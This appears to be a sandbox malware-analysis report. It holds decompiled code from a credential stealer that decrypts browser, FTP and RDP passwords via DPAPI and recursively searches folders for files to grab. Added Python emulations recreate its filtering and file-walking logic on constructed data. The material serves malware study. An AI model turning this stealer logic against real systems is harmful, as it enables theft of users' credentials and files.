                                                                                                                                        				int _v2060;
                                                                                                                                        				intOrPtr _v2064;
                                                                                                                                        				char _v2068;
                                                                                                                                        				char _v2072;
                                                                                                                                        				char _v2076;
                                                                                                                                        				void* _v2080;
                                                                                                                                        				char _v2084;
                                                                                                                                        				void* _v2088;
                                                                                                                                        				char _v2092;
                                                                                                                                        				intOrPtr _v2096;
                                                                                                                                        				void* _t53;
                                                                                                                                        				int _t58;
                                                                                                                                        
                                                                                                                                        				E1000795C(_a4,  &_v1028, _a20);
                                                                                                                                        				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0);
                                                                                                                                        				_v2068 = 0x10;
                                                                                                                                        				_v2064 = 2;
                                                                                                                                        				_v2060 = 0;
                                                                                                                                        				_v2056 = 0;
                                                                                                                                        				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0);
                                                                                                                                        				if(_v2076 == 0 || _v2072 == 0) {
                                                                                                                                        					return _t53;
                                                                                                                                        				}
                                                                                                                                        				_v2096 = 0xbeef0000;
                                                                                                                                        				if(lstrcmpiA( &_v1028, "Internet Explorer") == 0) {
                                                                                                                                        					L5:
                                                                                                                                        					_t58 = StrStrIA( &_v2052, "DPAPI: ");
                                                                                                                                        					if(_t58 == 0) {
                                                                                                                                        						_t58 = E10007B9C(_v2096, _a12, _v2072, _v2076, _a16);
                                                                                                                                        					} else {
                                                                                                                                        						if( *0x1000f4f4 != 0) {
                                                                                                                                        							_push(_v2076);
                                                                                                                                        							_pop( *_t29);
                                                                                                                                        							_push(_v2072);
                                                                                                                                        							_pop( *_t31);
                                                                                                                                        							_t58 =  *0x1000f4f4( &_v2084, 0, 0, 0, 0, 1,  &_v2092);
                                                                                                                                        							if(_t58 != 0) {
                                                                                                                                        								E10007B9C(_v2096, _a12, _v2088, _v2092, _a16);
                                                                                                                                        								_t58 = LocalFree(_v2088);
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					L11:
                                                                                                                                        					_push(_v2072);
                                                                                                                                        					L1000BA70();
                                                                                                                                        					return _t58;
                                                                                                                                        				}
                                                                                                                                        				_v2096 = 0xbeef0001;
                                                                                                                                        				if(lstrcmpiA( &_v1028, "WininetCacheCredentials") == 0) {
                                                                                                                                        					goto L5;
                                                                                                                                        				}
                                                                                                                                        				_v2096 = 0xbeef0002;
                                                                                                                                        				_t58 = lstrcmpiA( &_v1028, "MS IE FTP Passwords");
                                                                                                                                        				if(_t58 != 0) {
                                                                                                                                        					goto L11;
                                                                                                                                        				}
                                                                                                                                        				goto L5;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1000795C: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 10007995
                                                                                                                                          • Part of subcall function 1000795C: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 1000799E
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 10007CE5
                                                                                                                                        • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 10007D6F
                                                                                                                                        • lstrcmpiA.KERNEL32(?,WininetCacheCredentials,?,Internet Explorer), ref: 10007D8E
                                                                                                                                        • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords,?,WininetCacheCredentials,?,Internet Explorer), ref: 10007DAD
                                                                                                                                        • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 10007DC6
                                                                                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 10007E0C
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 10007E39
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 10007E63
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
                                                                                                                                        • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                                                                                                                        • API String ID: 2957877119-3076635702
                                                                                                                                        • Opcode ID: 843e745e34e14097c07889cfbb8b5dd406fc7868db0434c6aab2a77312663e5e
                                                                                                                                        • Instruction ID: e9adcbc705951ebd3b72bd25d622707a4cd7bfc22d8980c467875790b0128b8c
                                                                                                                                        • Opcode Fuzzy Hash: 843e745e34e14097c07889cfbb8b5dd406fc7868db0434c6aab2a77312663e5e
                                                                                                                                        • Instruction Fuzzy Hash: 7341E87290021DAAEF61DF50CC46FEA7BB9FF08380F0480E4F64865195DB75AA959FD0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.07%

                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                        			E100090E3(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                                                                                                                                        				int _v8;
                                                                                                                                        				char _v12;
                                                                                                                                        				char _v16;
                                                                                                                                        				int _v20;
                                                                                                                                        				char _v24;
                                                                                                                                        				char _v28;
                                                                                                                                        				int _v32;
                                                                                                                                        				char _v36;
                                                                                                                                        				void* _v40;
                                                                                                                                        				void* _v44;
                                                                                                                                        				char _v48;
                                                                                                                                        				void* _v52;
                                                                                                                                        				int _v56;
                                                                                                                                        				char* _v60;
                                                                                                                                        				void* _t55;
                                                                                                                                        				void* _t56;
                                                                                                                                        				int _t77;
                                                                                                                                        				int _t78;
                                                                                                                                        
                                                                                                                                        				_t55 = __eax;
                                                                                                                                        				if(_a16 == 0 ||  *0x1000f4f4 == 0) {
                                                                                                                                        					return _t55;
                                                                                                                                        				} else {
                                                                                                                                        					_t56 = _a16;
                                                                                                                                        					__eflags =  *0x10012e8c - _t56; // 0x0
                                                                                                                                        					if(__eflags < 0) {
                                                                                                                                        						__eflags =  *0x10012e90 - _t56; // 0x5
                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                        							__eflags =  *0x10012e94 - _t56; // 0x3
                                                                                                                                        							if(__eflags < 0) {
                                                                                                                                        								E10008860(_a12,  *0x10012e8c,  &_v8,  &_v12,  &_v16);
                                                                                                                                        								E10008860(_a12,  *0x10012e94,  &_v20,  &_v24,  &_v28);
                                                                                                                                        								E10008860(_a12,  *0x10012e90,  &_v32,  &_v36,  &_v40);
                                                                                                                                        								_push(_v32);
                                                                                                                                        								_pop( *_t16);
                                                                                                                                        								_push(_v40);
                                                                                                                                        								_pop( *_t18);
                                                                                                                                        								_v52 = 0;
                                                                                                                                        								_t56 =  *0x1000f4f4( &_v48, 0, 0, 0, 0, 1,  &_v56);
                                                                                                                                        								__eflags = _t56;
                                                                                                                                        								if(_t56 != 0) {
                                                                                                                                        									__eflags = _v52;
                                                                                                                                        									if(_v52 != 0) {
                                                                                                                                        										__eflags = _v56 - _v32;
                                                                                                                                        										if(_v56 <= _v32) {
                                                                                                                                        											asm("cld");
                                                                                                                                        											asm("jecxz 0x4");
                                                                                                                                        											memcpy(_v40, _v52, _v56);
                                                                                                                                        											_push(_v56);
                                                                                                                                        											_pop( *_t29);
                                                                                                                                        											_t56 = LocalFree(_v52);
                                                                                                                                        											__eflags = _v8;
                                                                                                                                        											if(_v8 != 0) {
                                                                                                                                        												__eflags = _v20;
                                                                                                                                        												if(_v20 != 0) {
                                                                                                                                        													__eflags = _v32;
                                                                                                                                        													if(_v32 != 0) {
                                                                                                                                        														_v60 = E10001888(_v8);
                                                                                                                                        														E100018BF(_v16, _v60, _v8);
                                                                                                                                        														_t77 = StrCmpNIA(_v60, "ftp://", lstrlenA("ftp://"));
                                                                                                                                        														__eflags = _t77;
                                                                                                                                        														if(_t77 != 0) {
                                                                                                                                        															_t77 = StrCmpNIA(_v60, "http://", lstrlenA("http://"));
                                                                                                                                        														}
                                                                                                                                        														_t78 = _t77;
                                                                                                                                        														__eflags = _t78;
                                                                                                                                        														if(_t78 != 0) {
                                                                                                                                        															_t78 = StrCmpNIA(_v60, "https://", lstrlenA("https://"));
                                                                                                                                        														}
                                                                                                                                        														__eflags = _t78;
                                                                                                                                        														if(_t78 == 0) {
                                                                                                                                        															E10001522(_a8, _a20);
                                                                                                                                        															E10001522(_a8,  *0x10012e88);
                                                                                                                                        															E10001558(_a8, _v16, _v8);
                                                                                                                                        															E10001558(_a8, _v28, _v20);
                                                                                                                                        															E10001558(_a8, _v40, _v32);
                                                                                                                                        														}
                                                                                                                                        														return E10001871(_v60);
                                                                                                                                        													}
                                                                                                                                        												}
                                                                                                                                        											}
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					return _t56;
                                                                                                                                        				}
                                                                                                                                        			}
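The tail above is the scheme filter applied to each decrypted credential: after CryptUnprotectData, the target string is compared case-insensitively against "ftp://", "http://" and "https://" with StrCmpNIA, each compare running only while the previous one failed, and the record is appended to the output buffer (E10001522/E10001558) only when the last result is zero; otherwise the string is just freed. Below is an added Python emulation written for this report (not code from the sample or from Joe Sandbox). The entries, their (target, user, password) shape and the names are constructed; only the prefix test is taken from the listing.

```python
# Added example: emulation of the StrCmpNIA scheme filter in the decompiled
# tail above.  Sample entries and the (target, user, password) layout are
# constructed; the three scheme literals and the compare chain come from the
# listing.

SCHEMES = ("ftp://", "http://", "https://")  # literals passed to StrCmpNIA


def str_cmp_ni_a(s, prefix, n):
    """Win32 StrCmpNIA semantics: compare at most n characters of two strings
    case-insensitively; return 0 when they match, nonzero otherwise."""
    a, b = s[:n].lower(), prefix[:n].lower()
    if a == b:
        return 0
    return -1 if a < b else 1


def has_allowed_scheme(target):
    """Mirror of the short-circuit chain: "ftp://" first, "http://" only if that
    failed, "https://" only if that failed too; emit when the last result is 0."""
    result = str_cmp_ni_a(target, SCHEMES[0], len(SCHEMES[0]))
    if result != 0:
        result = str_cmp_ni_a(target, SCHEMES[1], len(SCHEMES[1]))
    if result != 0:
        result = str_cmp_ni_a(target, SCHEMES[2], len(SCHEMES[2]))
    return result == 0


def filter_credentials(entries):
    """entries: (target, user, password) triples as they would come out of the
    CryptUnprotectData path.  Returns the ones the sample would append to its
    output buffer; every other entry is freed and dropped."""
    return [entry for entry in entries if has_allowed_scheme(entry[0])]


# Constructed input (hypothetical hosts under .test, not real credentials).
SAMPLE_ENTRIES = [
    ("https://mail.example.test/", "alice", "p@ss1"),
    ("HTTP://intranet.example.test", "bob", "p@ss2"),  # upper-case scheme still matches
    ("ftp://files.example.test", "carol", "p@ss3"),
    ("TERMSRV/host.example.test", "dave", "p@ss4"),    # non-URL target: dropped
    ("http", "", ""),                                  # shorter than the prefix: dropped
]

if __name__ == "__main__":
    for target, user, _ in filter_credentials(SAMPLE_ENTRIES):
        print(target, user)
```

The point to take from the emulation: case does not matter (StrCmpNIA), only the first len(prefix) characters are compared, and anything that is not an ftp/http/https target never reaches the output buffer.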
Instruction address column for the listing above (0x100090e3 to 0x100092b3, one address per decompiled line).

                                                                                                                                        APIs
                                                                                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 1000919A
                                                                                                                                        • LocalFree.KERNEL32(00000000,?), ref: 100091D5
                                                                                                                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 10009216
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 10009224
                                                                                                                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 10009232
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 10009240
                                                                                                                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 1000924E
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 1000925C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CryptDataFreeLocalUnprotect
                                                                                                                                        • String ID: ftp://$http://$https://
                                                                                                                                        • API String ID: 3968356742-2804853444
                                                                                                                                        • Opcode ID: 9db12690bd936ee5170574fd5d0f744996d9c3819de52a5819970623f0c1ff3e
                                                                                                                                        • Instruction ID: a8f04a90c6485cdf296070f0934c36fbafb71a4b9764bcec3bcd247837d1814c
                                                                                                                                        • Opcode Fuzzy Hash: 9db12690bd936ee5170574fd5d0f744996d9c3819de52a5819970623f0c1ff3e
                                                                                                                                        • Instruction Fuzzy Hash: 6951B676900509FAEF02DF90DC41EEE7BBAEF08391F108121F615B5069D771AAA4EB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000673C(void* __ebx, void* __ecx, intOrPtr _a4, char* _a8, char* _a12) {
                                                                                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                                                                                        				void* _v328;
                                                                                                                                        				CHAR* _v332;
                                                                                                                                        				char* _v336;
                                                                                                                                        				char* _t36;
                                                                                                                                        				signed int _t38;
                                                                                                                                        				CHAR* _t40;
                                                                                                                                        				void* _t44;
                                                                                                                                        				char* _t47;
                                                                                                                                        				int _t50;
                                                                                                                                        				int _t52;
                                                                                                                                        				int _t55;
                                                                                                                                        				signed int _t57;
                                                                                                                                        				void* _t59;
                                                                                                                                        				void* _t68;
                                                                                                                                        				void* _t69;
                                                                                                                                        				signed int* _t70;
                                                                                                                                        
                                                                                                                                        				_t69 = __ecx;
                                                                                                                                        				_t68 = __ebx;
                                                                                                                                        				_v332 = 0;
                                                                                                                                        				_t36 = _a8;
                                                                                                                                        				if(_t36 == 0 ||  *_t36 == 0) {
                                                                                                                                        					L20:
                                                                                                                                        					return E10001871(_v332);
                                                                                                                                        				} else {
                                                                                                                                        					_t38 = E10002582(_a8);
                                                                                                                                        					__eflags = _t38;
                                                                                                                                        					if(_t38 != 0) {
                                                                                                                                        						_t40 = E10001DB1(_a8, "*.*");
                                                                                                                                        					} else {
                                                                                                                                        						_t40 = E10001DB1(_a8, "\*.*");
                                                                                                                                        					}
                                                                                                                                        					_v332 = _t40;
                                                                                                                                        					E1000189F( &_v324, 0x13e);
                                                                                                                                        					_t44 = FindFirstFileA(_v332,  &_v324);
                                                                                                                                        					_v328 = _t44;
                                                                                                                                        					__eflags = _t44 + 1;
                                                                                                                                        					if(_t44 + 1 != 0) {
                                                                                                                                        						do {
                                                                                                                                        							_t70 =  &_v324;
                                                                                                                                        							__eflags =  *_t70 & 0x00000010;
                                                                                                                                        							if(( *_t70 & 0x00000010) == 0) {
                                                                                                                                        								_v336 =  &(_t70[0xb]);
                                                                                                                                        								_t47 = StrStrIA(_v336, _a12);
                                                                                                                                        								__eflags = _t47;
                                                                                                                                        								if(_t47 != 0) {
                                                                                                                                        									E100066F7(_t68, _t69, _t70, __eflags, _a4, E10001E05(E10001DB1(_a8, "\\"), _v336));
                                                                                                                                        									E10001871(_t65);
                                                                                                                                        								}
                                                                                                                                        							} else {
                                                                                                                                        								_t52 = lstrcmpiA(0x1000f8fd,  &(_t70[0xb]));
                                                                                                                                        								__eflags = _t52;
                                                                                                                                        								if(_t52 != 0) {
                                                                                                                                        									_t55 = lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName));
                                                                                                                                        									__eflags = _t55;
                                                                                                                                        									if(_t55 != 0) {
                                                                                                                                        										_t57 = E10002582(_a8);
                                                                                                                                        										__eflags = _t57;
                                                                                                                                        										if(_t57 != 0) {
                                                                                                                                        											_t59 = E10001DB1(_a8, 0);
                                                                                                                                        										} else {
                                                                                                                                        											_t59 = E10001DB1(_a8, "\\");
                                                                                                                                        										}
                                                                                                                                        										E1000673C(_t68, _t69, _a4, E10001E05(_t59,  &( &_v324->cFileName)), _a12);
                                                                                                                                        										E10001871(_t60);
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        							_t50 = FindNextFileA(_v328,  &_v324);
                                                                                                                                        							__eflags = _t50;
                                                                                                                                        						} while (_t50 != 0);
                                                                                                                                        						FindClose(_v328);
                                                                                                                                        					}
                                                                                                                                        					goto L20;
                                                                                                                                        				}
                                                                                                                                        			}
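E1000673C is the sample's recursive file grabber: it zeroes a 0x13e-byte WIN32_FIND_DATAA (318 bytes is exactly sizeof(WIN32_FIND_DATAA)), enumerates "<path>\*.*", skips "." and "..", recurses into every other entry with FILE_ATTRIBUTE_DIRECTORY (0x10) set, and hands every other entry whose cFileName (offset 0x2c, i.e. _t70[0xb]) contains the _a12 substring case-insensitively (StrStrIA) to E100066F7 together with its full path. Below is an added Python emulation of that walk over a constructed in-memory tree, written for this report and not code from the sample or from Joe Sandbox. Labelled assumptions: the constants 0x1000f8fd and 0x1000f8ff compared with lstrcmpiA are taken to be "." and ".."; E10002582 is taken to test whether the path already ends in a backslash (inferred from its result selecting "*.*" versus "\*.*"); E10001DB1/E10001E05 are taken to be string concatenation; the grabber callback here just records the path.

```python
# Added example: readable emulation of the decompiled E1000673C over a
# constructed directory tree.  Assumed (not shown on the page): 0x1000f8fd and
# 0x1000f8ff are "." and ".."; E10002582 tests for a trailing backslash;
# E10001DB1/E10001E05 concatenate strings; E100066F7 is the per-file grabber.

FILE_ATTRIBUTE_DIRECTORY = 0x10  # dwFileAttributes bit tested as `*_t70 & 0x00000010`

# Constructed tree: directory -> (cFileName, dwFileAttributes) entries in the
# order FindFirstFileA/FindNextFileA would return them, "." and ".." included.
FAKE_FS = {
    "C:\\Users\\victim": [
        (".", 0x10), ("..", 0x10),
        ("AppData", 0x10),
        ("Config.ini", 0x20),
        ("notes.txt", 0x20),
    ],
    "C:\\Users\\victim\\AppData": [
        (".", 0x10), ("..", 0x10),
        ("Roaming", 0x10),
    ],
    "C:\\Users\\victim\\AppData\\Roaming": [
        (".", 0x10), ("..", 0x10),
        ("FtpClient", 0x10),
        ("wallet.dat", 0x20),
    ],
    "C:\\Users\\victim\\AppData\\Roaming\\FtpClient": [
        (".", 0x10), ("..", 0x10),
        ("sites.config", 0x20),
        ("CONFIG.BAK", 0x20),
    ],
}


def ends_with_separator(path):
    """Assumed role of E10002582: nonzero when `path` already ends in '\\'."""
    return path.endswith("\\")


def find_first_next(pattern, listing):
    """Stand-in for FindFirstFileA/FindNextFileA on a '<dir>\\*.*' pattern.
    Returns [] where the real call fails (handle == INVALID_HANDLE_VALUE),
    which is exactly the `_t44 + 1 != 0` branch being skipped."""
    directory = pattern[:-len("\\*.*")]
    return listing.get(directory, [])


def find_files(path, needle, listing=FAKE_FS, grabbed=None):
    """Emulates E1000673C(_a4, path=_a8, needle=_a12).

    Every non-directory entry whose name contains `needle` (StrStrIA, so
    case-insensitive) is handed to the grabber; directories other than "."
    and ".." are recursed into.  Returns the grabbed full paths in walk order."""
    if grabbed is None:
        grabbed = []
    if not path:  # `_t36 == 0 || *_t36 == 0`: nothing to enumerate
        return grabbed

    pattern = path + ("*.*" if ends_with_separator(path) else "\\*.*")
    for name, attrs in find_first_next(pattern, listing):
        if attrs & FILE_ATTRIBUTE_DIRECTORY:
            if name in (".", ".."):  # the two lstrcmpiA checks (assumed constants)
                continue
            # Directory branch honours the trailing-separator test before joining.
            child = path + name if ends_with_separator(path) else path + "\\" + name
            find_files(child, needle, listing, grabbed)
        elif needle.lower() in name.lower():  # StrStrIA(cFileName, needle) != NULL
            # File branch always inserts "\\" (E10001DB1(_a8, "\\")), even when
            # `path` already ends in one, so a trailing-separator start path
            # yields a doubled backslash here.  Harmless on Windows.
            grabbed.append(path + "\\" + name)
    return grabbed


if __name__ == "__main__":
    for hit in find_files("C:\\Users\\victim", "config"):
        print(hit)
```

Two caveats the emulation makes visible: the only pruning is the "." and ".." test (no depth limit, no FILE_ATTRIBUTE_REPARSE_POINT check, so a junction is entered whenever FindFirstFileA can open it), and an empty needle matches every file because StrStrIA returns a non-NULL pointer for an empty search string.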
Instruction address column for E1000673C (begins at 0x1000673c, one address per decompiled line).
                                                                                                                                        0x100067c4
                                                                                                                                        0x100067ca
                                                                                                                                        0x1000684c
                                                                                                                                        0x1000685b
                                                                                                                                        0x10006860
                                                                                                                                        0x10006862
                                                                                                                                        0x10006882
                                                                                                                                        0x10006887
                                                                                                                                        0x10006887
                                                                                                                                        0x100067cc
                                                                                                                                        0x100067d5
                                                                                                                                        0x100067da
                                                                                                                                        0x100067dc
                                                                                                                                        0x100067f2
                                                                                                                                        0x100067f7
                                                                                                                                        0x100067f9
                                                                                                                                        0x10006803
                                                                                                                                        0x10006808
                                                                                                                                        0x1000680a
                                                                                                                                        0x10006820
                                                                                                                                        0x1000680c
                                                                                                                                        0x10006814
                                                                                                                                        0x10006814
                                                                                                                                        0x1000683d
                                                                                                                                        0x10006842
                                                                                                                                        0x10006842
                                                                                                                                        0x100067f9
                                                                                                                                        0x100067dc
                                                                                                                                        0x10006899
                                                                                                                                        0x1000689e
                                                                                                                                        0x1000689e
                                                                                                                                        0x100068ac
                                                                                                                                        0x100068ac
                                                                                                                                        0x00000000
                                                                                                                                        0x100067b8

                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 100067AC
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?), ref: 100067D5
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?), ref: 100067F2
                                                                                                                                        • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 10006899
                                                                                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 100068AC
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                                                                                        • String ID: *.*$\*.*
                                                                                                                                        • API String ID: 3040542784-1692270452
                                                                                                                                        • Opcode ID: 9170db4388df77e2495e4da8e8266ef47b2c407c22afde52e3aa8c4dcb22d9fd
                                                                                                                                        • Instruction ID: 2b7cc74e8ea56bf38fa23f324190ba7fb338ac5da67e571f415430ffc7027be8
                                                                                                                                        • Opcode Fuzzy Hash: 9170db4388df77e2495e4da8e8266ef47b2c407c22afde52e3aa8c4dcb22d9fd
                                                                                                                                        • Instruction Fuzzy Hash: 8D311E75404109AEFF11DF60DC42BED7766EF083C4F2482A5FA18A5029EF71AE909B50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 7.75%

                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                        			E10009DB0(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				char _v20;
                                                                                                                                        				signed char _v24;
                                                                                                                                        				CHAR* _v28;
                                                                                                                                        				signed char _v32;
                                                                                                                                        				void* _v36;
                                                                                                                                        				char _v40;
                                                                                                                                        				void* _v44;
                                                                                                                                        				char _v48;
                                                                                                                                        				signed char _t40;
                                                                                                                                        				signed char _t43;
                                                                                                                                        				signed char _t51;
                                                                                                                                        				signed char _t53;
                                                                                                                                        				signed char _t55;
                                                                                                                                        				signed char _t59;
                                                                                                                                        				signed char _t64;
                                                                                                                                        				signed char _t65;
                                                                                                                                        				char _t66;
                                                                                                                                        
                                                                                                                                        				if( *0x1000f4f4 != 0) {
                                                                                                                                        					_t40 = E10001FB7(__eflags, _a8,  &_v20);
                                                                                                                                        					__eflags = _t40;
                                                                                                                                        					if(_t40 != 0) {
                                                                                                                                        						__eflags = _v8 - 0x100000;
                                                                                                                                        						if(_v8 >= 0x100000) {
                                                                                                                                        							L23:
                                                                                                                                        							return E1000204C( &_v20);
                                                                                                                                        						}
                                                                                                                                        						_t43 = E10002363(_v12, _v8);
                                                                                                                                        						__eflags = _t43;
                                                                                                                                        						if(_t43 != 0) {
                                                                                                                                        							goto L23;
                                                                                                                                        						}
                                                                                                                                        						_v24 = E10009CDE("username:s:", _v12, _v8);
                                                                                                                                        						_v28 = E10009CDE("password 51:b:", _v12, _v8);
                                                                                                                                        						_v32 = E10009CDE("full address:s:", _v12, _v8);
                                                                                                                                        						__eflags = _v24;
                                                                                                                                        						if(_v24 == 0) {
                                                                                                                                        							L22:
                                                                                                                                        							E10001871(_v24);
                                                                                                                                        							E10001871(_v28);
                                                                                                                                        							E10001871(_v32);
                                                                                                                                        							goto L23;
                                                                                                                                        						}
                                                                                                                                        						__eflags = _v28;
                                                                                                                                        						if(_v28 == 0) {
                                                                                                                                        							goto L22;
                                                                                                                                        						}
                                                                                                                                        						__eflags = _v32;
                                                                                                                                        						if(_v32 != 0) {
                                                                                                                                        							_t51 = lstrlenA(_v28);
                                                                                                                                        							_t64 = _t51 >> 1;
                                                                                                                                        							_push(_t64);
                                                                                                                                        							while(1) {
                                                                                                                                        								_t65 = _t64;
                                                                                                                                        								__eflags = _t65;
                                                                                                                                        								if(_t65 == 0) {
                                                                                                                                        									break;
                                                                                                                                        								}
                                                                                                                                        								asm("lodsw");
                                                                                                                                        								__eflags = _t51 - 0x30;
                                                                                                                                        								if(_t51 < 0x30) {
                                                                                                                                        									L12:
                                                                                                                                        									_t53 = _t51 - 0x41 + 0xa;
                                                                                                                                        									__eflags = _t53;
                                                                                                                                        									L13:
                                                                                                                                        									__eflags = _t53 - 0x30;
                                                                                                                                        									if(_t53 < 0x30) {
                                                                                                                                        										L16:
                                                                                                                                        										_t55 = _t53 - 0x41 + 0xa;
                                                                                                                                        										__eflags = _t55;
                                                                                                                                        										L17:
                                                                                                                                        										_t51 = _t55 << 0x00000004 | _t55 << 0x00000004;
                                                                                                                                        										asm("stosb");
                                                                                                                                        										_t64 = _t65 - 1;
                                                                                                                                        										__eflags = _t64;
                                                                                                                                        										continue;
                                                                                                                                        									}
                                                                                                                                        									__eflags = _t53 - 0x39;
                                                                                                                                        									if(_t53 > 0x39) {
                                                                                                                                        										goto L16;
                                                                                                                                        									}
                                                                                                                                        									_t55 = _t53 - 0x30;
                                                                                                                                        									goto L17;
                                                                                                                                        								}
                                                                                                                                        								__eflags = _t51 - 0x39;
                                                                                                                                        								if(_t51 > 0x39) {
                                                                                                                                        									goto L12;
                                                                                                                                        								}
                                                                                                                                        								_t53 = _t51 - 0x30;
                                                                                                                                        								goto L13;
                                                                                                                                        							}
                                                                                                                                        							_pop(_t66);
                                                                                                                                        							_v40 = _t66;
                                                                                                                                        							_push(_v28);
                                                                                                                                        							_pop( *_t22);
                                                                                                                                        							_v44 = 0;
                                                                                                                                        							_t59 =  *0x1000f4f4( &_v40, 0, 0, 0, 0, 1,  &_v48);
                                                                                                                                        							__eflags = _t59;
                                                                                                                                        							if(_t59 != 0) {
                                                                                                                                        								__eflags = _v44;
                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                        									E10009B9C(__eflags, _a4, _v24, _v32, _v44, _v48);
                                                                                                                                        									LocalFree(_v44);
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						goto L22;
                                                                                                                                        					}
                                                                                                                                        					return _t40;
                                                                                                                                        				} else {
                                                                                                                                        					return __eax;
                                                                                                                                        				}
			}
                                                                                                                                        0x00000000
                                                                                                                                        0x10009efa
                                                                                                                                        0x10009e3e
                                                                                                                                        0x10009e42
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e48
                                                                                                                                        0x10009e4c
                                                                                                                                        0x10009e55
                                                                                                                                        0x10009e61
                                                                                                                                        0x10009e63
                                                                                                                                        0x10009e94
                                                                                                                                        0x10009e94
                                                                                                                                        0x10009e94
                                                                                                                                        0x10009e96
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e66
                                                                                                                                        0x10009e68
                                                                                                                                        0x10009e6a
                                                                                                                                        0x10009e74
                                                                                                                                        0x10009e76
                                                                                                                                        0x10009e76
                                                                                                                                        0x10009e78
                                                                                                                                        0x10009e78
                                                                                                                                        0x10009e7b
                                                                                                                                        0x10009e87
                                                                                                                                        0x10009e8a
                                                                                                                                        0x10009e8a
